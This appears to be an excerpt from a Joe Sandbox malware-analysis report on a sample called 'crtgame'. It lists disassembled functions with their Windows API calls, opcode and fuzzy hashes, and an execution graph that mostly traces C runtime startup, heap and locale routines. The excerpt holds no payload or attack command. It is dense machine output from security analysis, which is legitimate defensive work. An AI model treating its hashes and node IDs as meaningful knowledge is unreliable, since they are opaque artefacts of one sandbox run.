                                                                                                            • Instruction ID: 352fa3c33e130876c133b2754c5b4d876673d384c6c3ddc615f50f25897675de
                                                                                                            • Opcode Fuzzy Hash: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                                                            • Instruction Fuzzy Hash: 013113719012886EEB319B745C56ADA3F6C9B07709F2804FFE045F92C2D67D8F898B19
                                                                                                            APIs
                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 004048FB
                                                                                                            • GetFileType.KERNEL32(00000800), ref: 004049A1
                                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 004049FA
                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00404A08
                                                                                                            • SetHandleCount.KERNEL32 ref: 00404A3F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                                                            • String ID:
                                                                                                            • API String ID: 1710529072-0
                                                                                                            • Opcode ID: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                                                            • Instruction ID: 7ab3d1d28a75e02bc3976350f442f418a05f15b5b9e5150e71043de01d347dcb
                                                                                                            • Opcode Fuzzy Hash: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                                                            • Instruction Fuzzy Hash: 195126F16043208BD7208B38CD447677BA0AB81324F1A473AE7E6FB2E0D73C8855871A
                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(000000FF,00000000,00008000,@q@,00403DAC,@q@,74DEDFF0,?,00000000,?,?,00403E5E,00000010,00403113,?,?), ref: 00403CBB
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00403E5E,00000010,00403113,?,?), ref: 00403CF1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$HeapVirtual
                                                                                                            • String ID: @q@$@q@
                                                                                                            • API String ID: 3783212868-1591251108
                                                                                                            • Opcode ID: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                                                            • Instruction ID: c782c7eae1b72a8f5ff76f91d06b99a82836aed0f6ab4a515ec71bd81a8f307c
                                                                                                            • Opcode Fuzzy Hash: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                                                            • Instruction Fuzzy Hash: CCF03431A04210DFD7249F28EE09B427BF4FB08710B014A2AF5A6AB3E1C731AC40CF48
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 0040572A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID: $
                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                            • Opcode ID: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                                                            • Instruction ID: 1dc73218bf82df75e1ac1fd630f929f888ccf1ffeade1f599fe503148fb6ac43
                                                                                                            • Opcode Fuzzy Hash: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                                                            • Instruction Fuzzy Hash: 574127320046686EEB15A714DD59BFB3FA9DB06704F1400F6D94AFB1D2C27949288FAF
                                                                                                            APIs
                                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 004039E4
                                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 00403A18
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 00403A32
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 00403A49
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3499195154-0
                                                                                                            • Opcode ID: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                                                            • Instruction ID: 1692a555d73bf0e7419dcacebfa4393f5b3048e317361d03b61efb90fa74d0f8
                                                                                                            • Opcode Fuzzy Hash: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                                                            • Instruction Fuzzy Hash: 6F116A702003019FC7218F28EE49E267BB9FB957217184A3AF1D2E75B0C7729961CF09

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:3.6%
                                                                                                            Total number of Nodes:751
                                                                                                            Total number of Limit Nodes:34
                                                                                                            execution_graph 15322 2c33730 15323 2c33739 15322->15323 15324 2c3373e 15322->15324 15336 2c3b301 15323->15336 15328 2c33753 15324->15328 15327 2c3374c 15329 2c3375f ___lock_fhandle 15328->15329 15333 2c337ad ___DllMainCRTStartup 15329->15333 15335 2c3380a ___lock_fhandle 15329->15335 15340 2c335be 15329->15340 15331 2c337e7 15332 2c335be __CRT_INIT@12 138 API calls 15331->15332 15331->15335 15332->15335 15333->15331 15334 2c335be __CRT_INIT@12 138 API calls 15333->15334 15333->15335 15334->15331 15335->15327 15337 2c3b331 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 15336->15337 15338 2c3b324 15336->15338 15339 2c3b328 15337->15339 15338->15337 15338->15339 15339->15324 15341 2c335ca ___lock_fhandle 15340->15341 15342 2c335d2 15341->15342 15343 2c3364c 15341->15343 15388 2c37c06 GetProcessHeap 15342->15388 15345 2c33650 15343->15345 15346 2c336b5 15343->15346 15350 2c33671 15345->15350 15381 2c335db ___lock_fhandle __CRT_INIT@12 15345->15381 15489 2c37e7b 15345->15489 15348 2c336ba 15346->15348 15349 2c33718 15346->15349 15347 2c335d7 15347->15381 15389 2c357b4 15347->15389 15520 2c38beb 15348->15520 15349->15381 15548 2c35644 15349->15548 15492 2c37d52 RtlDecodePointer 15350->15492 15355 2c336c5 15355->15381 15523 2c3848c 15355->15523 15357 2c335e7 __RTC_Initialize 15365 2c335f7 GetCommandLineA 15357->15365 15357->15381 15360 2c33687 __CRT_INIT@12 15516 2c336a0 15360->15516 15363 2c3af9f __ioterm 60 API calls 15364 2c33682 15363->15364 15367 2c3582a __mtterm 62 API calls 15364->15367 15410 2c3b39d GetEnvironmentStringsW 15365->15410 15367->15360 15370 2c336ee 15372 2c336f4 15370->15372 15373 2c3370c 15370->15373 15532 2c35701 15372->15532 15542 2c32994 15373->15542 15374 2c33611 15378 2c33615 15374->15378 15442 2c3aff1 15374->15442 15377 2c336fc GetCurrentThreadId 15377->15381 15475 2c3582a 15378->15475 15381->15333 15383 2c33635 15383->15381 15484 2c3af9f 15383->15484 15388->15347 15556 2c37f22 RtlEncodePointer 15389->15556 15391 2c357b9 15561 2c3843e 15391->15561 15394 2c357c2 15396 2c3582a __mtterm 62 API calls 15394->15396 15397 2c357c7 15396->15397 15397->15357 15399 2c357df 15400 2c3848c __calloc_crt 59 API calls 15399->15400 15401 2c357ec 15400->15401 15402 2c35821 15401->15402 15403 2c38c0a __CRT_INIT@12 TlsSetValue 15401->15403 15404 2c3582a __mtterm 62 API calls 15402->15404 15405 2c35800 15403->15405 15406 2c35826 15404->15406 15405->15402 15407 2c35806 15405->15407 15406->15357 15408 2c35701 __initptd 59 API calls 15407->15408 15409 2c3580e GetCurrentThreadId 15408->15409 15409->15357 15411 2c3b3b0 WideCharToMultiByte 15410->15411 15412 2c33607 15410->15412 15414 2c3b3e3 15411->15414 15415 2c3b41a FreeEnvironmentStringsW 15411->15415 15423 2c3aceb 15412->15423 15572 2c384d4 15414->15572 15415->15412 15418 2c3b3f0 WideCharToMultiByte 15419 2c3b406 15418->15419 15420 2c3b40f FreeEnvironmentStringsW 15418->15420 15421 2c32994 ___endstdio 59 API calls 15419->15421 15420->15412 15422 2c3b40c 15421->15422 15422->15420 15424 2c3acf7 ___lock_fhandle 15423->15424 15425 2c3830d __lock 59 API calls 15424->15425 15426 2c3acfe 15425->15426 15427 2c3848c __calloc_crt 59 API calls 15426->15427 15430 2c3ad0f 15427->15430 15428 2c3ad1a ___lock_fhandle @_EH4_CallFilterFunc@8 15428->15374 15429 2c3ad7a GetStartupInfoW 15435 2c3ad8f 15429->15435 15439 2c3aebe 15429->15439 15430->15428 15430->15429 15431 2c3af86 15822 2c3af96 15431->15822 15433 2c3848c __calloc_crt 59 API calls 15433->15435 15434 2c3af0b GetStdHandle 15434->15439 15435->15433 15438 2c3addd 15435->15438 15435->15439 15436 2c3af1e GetFileType 15436->15439 15437 2c3ae11 GetFileType 15437->15438 15438->15437 15438->15439 15440 2c38c2c ___lock_fhandle InitializeCriticalSectionAndSpinCount 15438->15440 15439->15431 15439->15434 15439->15436 15441 2c38c2c ___lock_fhandle InitializeCriticalSectionAndSpinCount 15439->15441 15440->15438 15441->15439 15443 2c3b004 GetModuleFileNameA 15442->15443 15444 2c3afff 15442->15444 15446 2c3b031 15443->15446 15832 2c34caa 15444->15832 15826 2c3b0a4 15446->15826 15448 2c33621 15448->15383 15453 2c3b220 15448->15453 15450 2c384d4 __malloc_crt 59 API calls 15451 2c3b06a 15450->15451 15451->15448 15452 2c3b0a4 _parse_cmdline 59 API calls 15451->15452 15452->15448 15454 2c3b229 15453->15454 15458 2c3b22e __output_l 15453->15458 15455 2c34caa ___initmbctable 71 API calls 15454->15455 15455->15458 15456 2c3362a 15456->15383 15469 2c37e8a 15456->15469 15457 2c3848c __calloc_crt 59 API calls 15459 2c3b264 __output_l 15457->15459 15458->15456 15458->15457 15459->15456 15461 2c3b2b6 15459->15461 15462 2c3848c __calloc_crt 59 API calls 15459->15462 15463 2c3b2dd 15459->15463 15466 2c3b2f4 15459->15466 16036 2c366dc 15459->16036 15460 2c32994 ___endstdio 59 API calls 15460->15456 15461->15460 15462->15459 15464 2c32994 ___endstdio 59 API calls 15463->15464 15464->15456 15467 2c34925 __invoke_watson 8 API calls 15466->15467 15468 2c3b300 15467->15468 15471 2c37e96 __IsNonwritableInCurrentImage 15469->15471 16045 2c3ccff 15471->16045 15472 2c37eb4 __initterm_e 15474 2c37ed3 __cinit __IsNonwritableInCurrentImage 15472->15474 16048 2c32dc4 15472->16048 15474->15383 15476 2c35834 15475->15476 15478 2c3583a 15475->15478 16114 2c38bcc 15476->16114 15479 2c38357 RtlDeleteCriticalSection 15478->15479 15480 2c38373 15478->15480 15481 2c32994 ___endstdio 59 API calls 15479->15481 15482 2c38392 15480->15482 15483 2c3837f RtlDeleteCriticalSection 15480->15483 15481->15478 15482->15381 15483->15480 15485 2c3afa6 15484->15485 15486 2c3afee 15485->15486 15487 2c32994 ___endstdio 59 API calls 15485->15487 15488 2c3afbf RtlDeleteCriticalSection 15485->15488 15486->15378 15487->15485 15488->15485 15490 2c37fc4 _doexit 59 API calls 15489->15490 15491 2c37e86 15490->15491 15491->15350 15493 2c37d6c 15492->15493 15495 2c37d7e 15492->15495 15493->15495 15496 2c32994 ___endstdio 59 API calls 15493->15496 15494 2c32994 ___endstdio 59 API calls 15497 2c37d8b 15494->15497 15495->15494 15496->15493 15498 2c37daf 15497->15498 15500 2c32994 ___endstdio 59 API calls 15497->15500 15499 2c32994 ___endstdio 59 API calls 15498->15499 15501 2c37dbb 15499->15501 15500->15497 15502 2c32994 ___endstdio 59 API calls 15501->15502 15503 2c37dcc 15502->15503 15504 2c32994 ___endstdio 59 API calls 15503->15504 15505 2c37dd7 15504->15505 15506 2c37dfc RtlEncodePointer 15505->15506 15509 2c32994 ___endstdio 59 API calls 15505->15509 15507 2c37e11 15506->15507 15508 2c37e17 15506->15508 15510 2c32994 ___endstdio 59 API calls 15507->15510 15511 2c37e2d 15508->15511 15513 2c32994 ___endstdio 59 API calls 15508->15513 15512 2c37dfb 15509->15512 15510->15508 15514 2c33676 15511->15514 15515 2c32994 ___endstdio 59 API calls 15511->15515 15512->15506 15513->15511 15514->15360 15514->15363 15515->15514 15517 2c336b2 15516->15517 15518 2c336a4 15516->15518 15517->15381 15518->15517 15519 2c3582a __mtterm 62 API calls 15518->15519 15519->15517 15521 2c38c02 TlsGetValue 15520->15521 15522 2c38bfe 15520->15522 15521->15355 15522->15355 15525 2c38493 15523->15525 15526 2c336d6 15525->15526 15527 2c384b1 15525->15527 16117 2c3fed8 15525->16117 15526->15381 15529 2c38c0a 15526->15529 15527->15525 15527->15526 16125 2c38f25 Sleep 15527->16125 15530 2c38c20 15529->15530 15531 2c38c24 TlsSetValue 15529->15531 15530->15370 15531->15370 15533 2c3570d ___lock_fhandle 15532->15533 15534 2c3830d __lock 59 API calls 15533->15534 15535 2c3574a 15534->15535 16126 2c357a2 15535->16126 15538 2c3830d __lock 59 API calls 15539 2c3576b ___addlocaleref 15538->15539 16129 2c357ab 15539->16129 15541 2c35796 ___lock_fhandle 15541->15377 15543 2c329c6 __dosmaperr 15542->15543 15544 2c3299d HeapFree 15542->15544 15543->15381 15544->15543 15545 2c329b2 15544->15545 15546 2c3587b __commit 57 API calls 15545->15546 15547 2c329b8 GetLastError 15546->15547 15547->15543 15549 2c35651 15548->15549 15555 2c35677 15548->15555 15550 2c38beb __CRT_INIT@12 TlsGetValue 15549->15550 15552 2c3565f 15549->15552 15550->15552 15551 2c38c0a __CRT_INIT@12 TlsSetValue 15553 2c3566f 15551->15553 15552->15551 16134 2c3550f 15553->16134 15555->15381 15557 2c37f33 __init_pointers __initp_misc_winsig 15556->15557 15568 2c33428 RtlEncodePointer 15557->15568 15559 2c37f4b __init_pointers 15560 2c38c9a 34 API calls 15559->15560 15560->15391 15562 2c3844a 15561->15562 15564 2c357be 15562->15564 15569 2c38c2c 15562->15569 15564->15394 15565 2c38bae 15564->15565 15566 2c38bc5 TlsAlloc 15565->15566 15567 2c357d4 15565->15567 15567->15394 15567->15399 15568->15559 15570 2c38c49 InitializeCriticalSectionAndSpinCount 15569->15570 15571 2c38c3c 15569->15571 15570->15562 15571->15562 15574 2c384e2 15572->15574 15575 2c38514 15574->15575 15577 2c329cc 15574->15577 15594 2c38f25 Sleep 15574->15594 15575->15415 15575->15418 15578 2c32a47 15577->15578 15586 2c329d8 15577->15586 15579 2c37c23 __calloc_impl RtlDecodePointer 15578->15579 15580 2c32a4d 15579->15580 15581 2c3587b __commit 58 API calls 15580->15581 15593 2c32a3f 15581->15593 15583 2c32a0b RtlAllocateHeap 15583->15586 15583->15593 15585 2c32a33 15644 2c3587b 15585->15644 15586->15583 15586->15585 15590 2c329e3 15586->15590 15591 2c32a31 15586->15591 15642 2c37c23 RtlDecodePointer 15586->15642 15590->15586 15595 2c380f3 15590->15595 15604 2c38150 15590->15604 15639 2c37d3c 15590->15639 15592 2c3587b __commit 58 API calls 15591->15592 15592->15593 15593->15574 15594->15574 15647 2c3fb9e 15595->15647 15597 2c380fa 15598 2c3fb9e __NMSG_WRITE 59 API calls 15597->15598 15601 2c38107 15597->15601 15598->15601 15599 2c38150 __NMSG_WRITE 59 API calls 15600 2c3811f 15599->15600 15602 2c38150 __NMSG_WRITE 59 API calls 15600->15602 15601->15599 15603 2c38129 15601->15603 15602->15603 15603->15590 15605 2c3816e __NMSG_WRITE 15604->15605 15606 2c3fb9e __NMSG_WRITE 55 API calls 15605->15606 15638 2c38295 15605->15638 15608 2c38181 15606->15608 15610 2c3829a GetStdHandle 15608->15610 15611 2c3fb9e __NMSG_WRITE 55 API calls 15608->15611 15609 2c382fe 15609->15590 15614 2c382a8 __output_l 15610->15614 15610->15638 15612 2c38192 15611->15612 15612->15610 15613 2c381a4 15612->15613 15613->15638 15669 2c3ef5d 15613->15669 15616 2c382e1 WriteFile 15614->15616 15614->15638 15616->15638 15618 2c38302 15622 2c34925 __invoke_watson 8 API calls 15618->15622 15619 2c381d1 GetModuleFileNameW 15620 2c381f1 15619->15620 15621 2c38201 __NMSG_WRITE 15619->15621 15623 2c3ef5d __NMSG_WRITE 55 API calls 15620->15623 15621->15618 15625 2c38247 15621->15625 15678 2c3efd2 15621->15678 15624 2c3830c 15622->15624 15623->15621 15626 2c38331 RtlEnterCriticalSection 15624->15626 15728 2c38395 15624->15728 15625->15618 15687 2c3eef1 15625->15687 15626->15590 15630 2c38324 15630->15626 15750 2c37e5f 15630->15750 15632 2c3eef1 __NMSG_WRITE 55 API calls 15634 2c3827e 15632->15634 15634->15618 15636 2c38285 15634->15636 15696 2c3fbde RtlEncodePointer 15636->15696 15721 2c33f6b 15638->15721 15805 2c37d08 GetModuleHandleExW 15639->15805 15643 2c37c36 15642->15643 15643->15586 15808 2c35692 GetLastError 15644->15808 15646 2c35880 15646->15591 15648 2c3fba8 15647->15648 15649 2c3fbb2 15648->15649 15650 2c3587b __commit 59 API calls 15648->15650 15649->15597 15651 2c3fbce 15650->15651 15654 2c34915 15651->15654 15657 2c348ea RtlDecodePointer 15654->15657 15658 2c348fd 15657->15658 15663 2c34925 IsProcessorFeaturePresent 15658->15663 15661 2c348ea __commit 8 API calls 15662 2c34921 15661->15662 15662->15597 15664 2c34930 15663->15664 15665 2c347b8 __call_reportfault 7 API calls 15664->15665 15666 2c34945 15665->15666 15667 2c38f33 __invoke_watson GetCurrentProcess TerminateProcess 15666->15667 15668 2c34914 15667->15668 15668->15661 15670 2c3ef76 15669->15670 15671 2c3ef68 15669->15671 15672 2c3587b __commit 59 API calls 15670->15672 15671->15670 15675 2c3ef8f 15671->15675 15673 2c3ef80 15672->15673 15674 2c34915 __commit 9 API calls 15673->15674 15676 2c381c4 15674->15676 15675->15676 15677 2c3587b __commit 59 API calls 15675->15677 15676->15618 15676->15619 15677->15673 15683 2c3efe0 15678->15683 15679 2c3efe4 15680 2c3587b __commit 59 API calls 15679->15680 15681 2c3efe9 15679->15681 15682 2c3f014 15680->15682 15681->15625 15684 2c34915 __commit 9 API calls 15682->15684 15683->15679 15683->15681 15685 2c3f023 15683->15685 15684->15681 15685->15681 15686 2c3587b __commit 59 API calls 15685->15686 15686->15682 15688 2c3ef0b 15687->15688 15691 2c3eefd 15687->15691 15689 2c3587b __commit 59 API calls 15688->15689 15690 2c3ef15 15689->15690 15692 2c34915 __commit 9 API calls 15690->15692 15691->15688 15694 2c3ef37 15691->15694 15693 2c38267 15692->15693 15693->15618 15693->15632 15694->15693 15695 2c3587b __commit 59 API calls 15694->15695 15695->15690 15697 2c3fc12 ___crtIsPackagedApp 15696->15697 15698 2c3fcd1 IsDebuggerPresent 15697->15698 15699 2c3fc21 LoadLibraryExW 15697->15699 15700 2c3fcf6 15698->15700 15701 2c3fcdb 15698->15701 15702 2c3fc38 GetLastError 15699->15702 15703 2c3fc5e GetProcAddress 15699->15703 15705 2c3fce9 15700->15705 15706 2c3fcfb RtlDecodePointer 15700->15706 15704 2c3fce2 OutputDebugStringW 15701->15704 15701->15705 15707 2c3fc47 LoadLibraryExW 15702->15707 15711 2c3fcee 15702->15711 15708 2c3fc72 7 API calls 15703->15708 15703->15711 15704->15705 15705->15711 15714 2c3fd22 RtlDecodePointer RtlDecodePointer 15705->15714 15718 2c3fd3a 15705->15718 15706->15711 15707->15703 15707->15711 15709 2c3fcba GetProcAddress RtlEncodePointer 15708->15709 15710 2c3fcce 15708->15710 15709->15710 15710->15698 15712 2c33f6b __setmbcp_nolock 6 API calls 15711->15712 15716 2c3fdc0 15712->15716 15713 2c3fd72 RtlDecodePointer 15717 2c3fd79 15713->15717 15719 2c3fd5e RtlDecodePointer 15713->15719 15714->15718 15716->15638 15717->15719 15720 2c3fd8a RtlDecodePointer 15717->15720 15718->15713 15718->15719 15719->15711 15720->15719 15722 2c33f73 15721->15722 15723 2c33f75 IsProcessorFeaturePresent 15721->15723 15722->15609 15725 2c38fb2 15723->15725 15757 2c38f5e IsDebuggerPresent 15725->15757 15729 2c383a1 ___lock_fhandle 15728->15729 15730 2c380f3 __FF_MSGBANNER 59 API calls 15729->15730 15743 2c383c0 15729->15743 15731 2c383af 15730->15731 15733 2c38150 __NMSG_WRITE 59 API calls 15731->15733 15732 2c384d4 __malloc_crt 59 API calls 15734 2c383d7 15732->15734 15736 2c383b6 15733->15736 15737 2c383de 15734->15737 15738 2c383ed 15734->15738 15735 2c383e3 ___lock_fhandle 15735->15630 15739 2c37d3c _doexit 3 API calls 15736->15739 15740 2c3587b __commit 59 API calls 15737->15740 15765 2c3830d 15738->15765 15739->15743 15740->15735 15742 2c383f4 15744 2c38401 15742->15744 15745 2c38419 15742->15745 15743->15732 15743->15735 15746 2c38c2c ___lock_fhandle InitializeCriticalSectionAndSpinCount 15744->15746 15747 2c32994 ___endstdio 59 API calls 15745->15747 15748 2c3840d 15746->15748 15747->15748 15772 2c38435 15748->15772 15751 2c380f3 __FF_MSGBANNER 59 API calls 15750->15751 15752 2c37e67 15751->15752 15753 2c38150 __NMSG_WRITE 59 API calls 15752->15753 15754 2c37e6f 15753->15754 15776 2c37f0e 15754->15776 15758 2c38f73 __call_reportfault 15757->15758 15763 2c38f48 SetUnhandledExceptionFilter UnhandledExceptionFilter 15758->15763 15761 2c38f7b __call_reportfault 15764 2c38f33 GetCurrentProcess TerminateProcess 15761->15764 15762 2c38f98 15762->15609 15763->15761 15764->15762 15766 2c38331 RtlEnterCriticalSection 15765->15766 15767 2c3831e 15765->15767 15766->15742 15768 2c38395 __mtinitlocknum 58 API calls 15767->15768 15769 2c38324 15768->15769 15769->15766 15770 2c37e5f __amsg_exit 58 API calls 15769->15770 15771 2c38330 15770->15771 15771->15766 15775 2c38477 RtlLeaveCriticalSection 15772->15775 15774 2c3843c 15774->15735 15775->15774 15779 2c37fc4 15776->15779 15778 2c37e7a 15780 2c37fd0 ___lock_fhandle 15779->15780 15781 2c3830d __lock 52 API calls 15780->15781 15782 2c37fd7 15781->15782 15783 2c38090 __cinit 15782->15783 15784 2c38005 RtlDecodePointer 15782->15784 15799 2c380de 15783->15799 15784->15783 15786 2c3801c RtlDecodePointer 15784->15786 15792 2c3802c 15786->15792 15788 2c380ed ___lock_fhandle 15788->15778 15790 2c38039 RtlEncodePointer 15790->15792 15791 2c380d5 15793 2c380de 15791->15793 15794 2c37d3c _doexit 3 API calls 15791->15794 15792->15783 15792->15790 15795 2c38049 RtlDecodePointer RtlEncodePointer 15792->15795 15796 2c380eb 15793->15796 15804 2c38477 RtlLeaveCriticalSection 15793->15804 15794->15793 15798 2c3805b RtlDecodePointer RtlDecodePointer 15795->15798 15796->15778 15798->15792 15800 2c380e4 15799->15800 15801 2c380be 15799->15801 15802 2c38477 _doexit RtlLeaveCriticalSection 15800->15802 15801->15788 15803 2c38477 RtlLeaveCriticalSection 15801->15803 15802->15801 15803->15791 15804->15796 15806 2c37d21 GetProcAddress 15805->15806 15807 2c37d33 ExitProcess 15805->15807 15806->15807 15809 2c38beb __CRT_INIT@12 TlsGetValue 15808->15809 15810 2c356a7 15809->15810 15811 2c356f5 SetLastError 15810->15811 15812 2c3848c __calloc_crt 56 API calls 15810->15812 15811->15646 15813 2c356ba 15812->15813 15813->15811 15814 2c38c0a __CRT_INIT@12 TlsSetValue 15813->15814 15815 2c356ce 15814->15815 15816 2c356d4 15815->15816 15817 2c356ec 15815->15817 15819 2c35701 __initptd 56 API calls 15816->15819 15818 2c32994 ___endstdio 56 API calls 15817->15818 15820 2c356f2 15818->15820 15821 2c356dc GetCurrentThreadId 15819->15821 15820->15811 15821->15811 15825 2c38477 RtlLeaveCriticalSection 15822->15825 15824 2c3af9d 15824->15428 15825->15824 15828 2c3b0c6 15826->15828 15829 2c3b12a 15828->15829 15836 2c41006 15828->15836 15830 2c3b047 15829->15830 15831 2c41006 _parse_cmdline 59 API calls 15829->15831 15830->15448 15830->15450 15831->15829 15833 2c34cb3 15832->15833 15835 2c34cba 15832->15835 15924 2c35007 15833->15924 15835->15443 15839 2c40fac 15836->15839 15842 2c31c9b 15839->15842 15843 2c31cac 15842->15843 15847 2c31cf9 15842->15847 15850 2c3567a 15843->15850 15846 2c31cd9 15846->15847 15870 2c34f61 15846->15870 15847->15828 15851 2c35692 __getptd_noexit 59 API calls 15850->15851 15852 2c35680 15851->15852 15853 2c31cb2 15852->15853 15854 2c37e5f __amsg_exit 59 API calls 15852->15854 15853->15846 15855 2c34bdf 15853->15855 15854->15853 15856 2c34beb ___lock_fhandle 15855->15856 15857 2c3567a _LocaleUpdate::_LocaleUpdate 59 API calls 15856->15857 15858 2c34bf4 15857->15858 15859 2c34c23 15858->15859 15861 2c34c07 15858->15861 15860 2c3830d __lock 59 API calls 15859->15860 15862 2c34c2a 15860->15862 15863 2c3567a _LocaleUpdate::_LocaleUpdate 59 API calls 15861->15863 15882 2c34c5f 15862->15882 15865 2c34c0c 15863->15865 15868 2c34c1a ___lock_fhandle 15865->15868 15869 2c37e5f __amsg_exit 59 API calls 15865->15869 15868->15846 15869->15868 15871 2c34f6d ___lock_fhandle 15870->15871 15872 2c3567a _LocaleUpdate::_LocaleUpdate 59 API calls 15871->15872 15873 2c34f77 15872->15873 15874 2c34f89 15873->15874 15875 2c3830d __lock 59 API calls 15873->15875 15876 2c34f97 ___lock_fhandle 15874->15876 15878 2c37e5f __amsg_exit 59 API calls 15874->15878 15880 2c34fa7 15875->15880 15876->15847 15877 2c34fd4 15920 2c34ffe 15877->15920 15878->15876 15880->15877 15881 2c32994 ___endstdio 59 API calls 15880->15881 15881->15877 15883 2c34c6a ___addlocaleref ___removelocaleref 15882->15883 15885 2c34c3e 15882->15885 15883->15885 15889 2c349e5 15883->15889 15886 2c34c56 15885->15886 15919 2c38477 RtlLeaveCriticalSection 15886->15919 15888 2c34c5d 15888->15865 15890 2c34a5e 15889->15890 15892 2c349fa 15889->15892 15891 2c34aab 15890->15891 15893 2c32994 ___endstdio 59 API calls 15890->15893 15895 2c3cf5d ___free_lc_time 59 API calls 15891->15895 15900 2c34ad4 15891->15900 15892->15890 15894 2c34a2b 15892->15894 15903 2c32994 ___endstdio 59 API calls 15892->15903 15896 2c34a7f 15893->15896 15898 2c34a49 15894->15898 15906 2c32994 ___endstdio 59 API calls 15894->15906 15897 2c34ac9 15895->15897 15899 2c32994 ___endstdio 59 API calls 15896->15899 15904 2c32994 ___endstdio 59 API calls 15897->15904 15902 2c32994 ___endstdio 59 API calls 15898->15902 15901 2c34a92 15899->15901 15905 2c34b33 15900->15905 15915 2c32994 59 API calls ___endstdio 15900->15915 15907 2c32994 ___endstdio 59 API calls 15901->15907 15908 2c34a53 15902->15908 15909 2c34a20 15903->15909 15904->15900 15910 2c32994 ___endstdio 59 API calls 15905->15910 15912 2c34a3e 15906->15912 15913 2c34aa0 15907->15913 15914 2c32994 ___endstdio 59 API calls 15908->15914 15916 2c3cdfa ___free_lconv_mon 59 API calls 15909->15916 15911 2c34b39 15910->15911 15911->15885 15917 2c3cef6 ___free_lconv_num 59 API calls 15912->15917 15918 2c32994 ___endstdio 59 API calls 15913->15918 15914->15890 15915->15900 15916->15894 15917->15898 15918->15891 15919->15888 15923 2c38477 RtlLeaveCriticalSection 15920->15923 15922 2c35005 15922->15874 15923->15922 15925 2c35013 ___lock_fhandle 15924->15925 15926 2c3567a _LocaleUpdate::_LocaleUpdate 59 API calls 15925->15926 15927 2c3501b 15926->15927 15928 2c34f61 _LocaleUpdate::_LocaleUpdate 59 API calls 15927->15928 15929 2c35025 15928->15929 15949 2c34d02 15929->15949 15932 2c384d4 __malloc_crt 59 API calls 15934 2c35047 15932->15934 15933 2c35174 ___lock_fhandle 15933->15835 15934->15933 15956 2c351af 15934->15956 15937 2c35184 15937->15933 15940 2c35197 15937->15940 15943 2c32994 ___endstdio 59 API calls 15937->15943 15938 2c3507d 15939 2c3509d 15938->15939 15942 2c32994 ___endstdio 59 API calls 15938->15942 15939->15933 15944 2c3830d __lock 59 API calls 15939->15944 15941 2c3587b __commit 59 API calls 15940->15941 15941->15933 15942->15939 15943->15940 15946 2c350cc 15944->15946 15945 2c3515a 15966 2c35179 15945->15966 15946->15945 15948 2c32994 ___endstdio 59 API calls 15946->15948 15948->15945 15950 2c31c9b _LocaleUpdate::_LocaleUpdate 59 API calls 15949->15950 15951 2c34d12 15950->15951 15952 